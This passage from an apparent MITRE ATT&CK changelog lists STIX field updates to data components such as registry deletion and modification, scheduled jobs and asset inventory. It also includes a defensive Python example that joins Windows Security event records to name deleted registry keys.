  - Event ID 4660 - An object was deleted: Logged when an audited registry key is deleted. It carries the Handle ID and process but not the key name, so the name must be joined from the preceding 4656/4663 record for the same handle. Requires the Audit Registry subcategory and a SACL auditing Delete on the key.
- Sysmon (System Monitor) for Windows
  - Sysmon Event ID 12 - RegistryEvent (Object create and delete): Logs creation and deletion of both keys and values, with the key path in the event; the EventType field (e.g., `DeleteKey` vs `DeleteValue`) distinguishes them.
  - Sysmon Event ID 13 - RegistryEvent (Value Set): Records writes to values, not deletions; value deletions are Event ID 12 with EventType `DeleteValue`.
- Endpoint Detection and Response (EDR) Solutions
- Monitor registry deletions for suspicious behavior. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
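Worked example (added here; not part of the ATT&CK data): Event ID 4660 never names the deleted object, so a detection that only collects 4660 knows a key was deleted but not which one. The Python below correlates a constructed sequence of Security-log records, taking the key name from the 4656/4663 record with the same Process ID and Handle ID and forgetting the handle on 4658 so that a reused Handle ID is not mis-attributed. The field names are assumptions for the example and only loosely mirror the event's EventData names.

```python
"""Name the registry key behind Event ID 4660 by joining it to 4656/4663 on the handle."""

# Constructed Security-log records, not real telemetry. Field names loosely follow the
# EventData names (ProcessId, HandleId, ObjectName, AccessList) a SIEM would keep.
SAMPLE_EVENTS = [
    {"time": 1, "event_id": 4663, "process_id": "0x1f40", "handle_id": "0x2c8",
     "object_type": "Key",
     "object_name": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "accesses": "DELETE", "subject": r"CORP\alice", "process_name": r"C:\Windows\regedit.exe"},
    {"time": 2, "event_id": 4660, "process_id": "0x1f40", "handle_id": "0x2c8",
     "subject": r"CORP\alice", "process_name": r"C:\Windows\regedit.exe"},
    {"time": 3, "event_id": 4658, "process_id": "0x1f40", "handle_id": "0x2c8",
     "subject": r"CORP\alice", "process_name": r"C:\Windows\regedit.exe"},
    # The same process reuses handle 0x2c8 later, but its new 4663 was not collected
    # (e.g. dropped by the forwarder). Without forgetting the handle on 4658, this
    # deletion would be wrongly reported as the Updater key a second time.
    {"time": 4, "event_id": 4660, "process_id": "0x1f40", "handle_id": "0x2c8",
     "subject": r"CORP\alice", "process_name": r"C:\Windows\regedit.exe"},
]


def correlate_registry_deletions(events: list) -> list:
    """Walk Security-log records in time order and name each deleted registry key.

    4660 carries only Handle ID and Process ID, never the object name, so the name is
    taken from the earlier 4656/4663 record for the same handle in the same process.
    Handle IDs are reused after 4658, so the map is keyed by (process_id, handle_id)
    and the entry is dropped once the handle closes.
    """
    open_handles = {}
    deletions = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["process_id"], ev["handle_id"])
        if ev["event_id"] in (4656, 4663) and ev.get("object_type") == "Key":
            open_handles[key] = ev
        elif ev["event_id"] == 4660:
            opener = open_handles.get(key)
            deletions.append({
                "time": ev["time"],
                "subject": ev["subject"],
                "process_name": ev["process_name"],
                "handle_id": ev["handle_id"],
                "object_name": opener["object_name"] if opener else None,
                "resolved": opener is not None,
                # DELETE in the audited access list confirms the handle was opened to delete.
                "delete_access_seen": bool(opener and "DELETE" in opener.get("accesses", "")),
            })
        elif ev["event_id"] == 4658:
            open_handles.pop(key, None)
    return deletions


if __name__ == "__main__":
    for d in correlate_registry_deletions(SAMPLE_EVENTS):
        print(d)
```

An unresolved deletion is still reported, because the missing opener is itself a collection problem to chase; where Sysmon is deployed, Event ID 12 carries the key path directly and needs none of this joining.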
Windows Registry: Windows Registry Key Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:11:59.993Z |
description | Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14) | Changes made to an existing registry key or its values. These modifications can include altering permissions, modifying stored data, or updating configuration settings.
*Data Collection Measures:*
- Windows Event Logs
  - Event ID 4657 - A registry value was modified: Logs changes to registry values, including startup entries, security settings, or system configurations, but only for keys that carry a SACL auditing Set Value under the Audit Registry subcategory, so the audit policy and SACLs on keys of interest (Run keys, service entries) must be configured first.
- Sysmon (System Monitor) for Windows
- Sysmon Event ID 13 - Registry Value Set: Captures changes to specific registry values.
- Sysmon Event ID 14 - Registry Key & Value Renamed: Logs renaming of registry keys, which may indicate evasion attempts.
- Endpoint Detection and Response (EDR) Solutions
- Monitor registry modifications for suspicious behavior. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Patches
Asset: Asset Inventory
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-21T21:47:58.629Z | 2025-04-18T15:11:50.339Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_domains[0] | enterprise-attack | ics-attack |
Operational Databases: Device Alarm
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-05-11T16:22:58.802Z | 2025-04-16T21:26:36.998Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Logon Session: Logon Session Metadata
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:12:23.075Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Operational Databases: Process History/Live Data
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-05-11T16:22:58.802Z | 2025-04-16T21:26:36.842Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Metadata
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:37.873Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Operational Databases: Process/Event Alarm
Current version: 1.0
Details
values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-05-11T16:22:58.802Z | 2025-04-16T21:26:36.694Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Metadata
Current version: 1.0
Details
dictionary_item_added

| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_domains | | ['enterprise-attack'] |

values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:39.543Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Modification
Current version: 1.0
Description changed:

| Old value | New Value |
|---|---|
| Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs) | Changes made to an existing scheduled job, including modifications to its execution parameters, command payload, or execution timing. |
Details
dictionary_item_added

| STIX Field | Old value | New Value |
|---|---|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |

values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:40.267Z |
| description | Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs) | Changes made to an existing scheduled job, including modifications to its execution parameters, command payload, or execution timing. |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Service: Service Metadata
Current version: 1.0
Details
dictionary_item_added

| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |

values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:51.004Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Asset: Software
Current version: 1.0
Details
values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-21T21:47:33.604Z | 2025-04-18T15:11:53.563Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_domains[0] | enterprise-attack | ics-attack |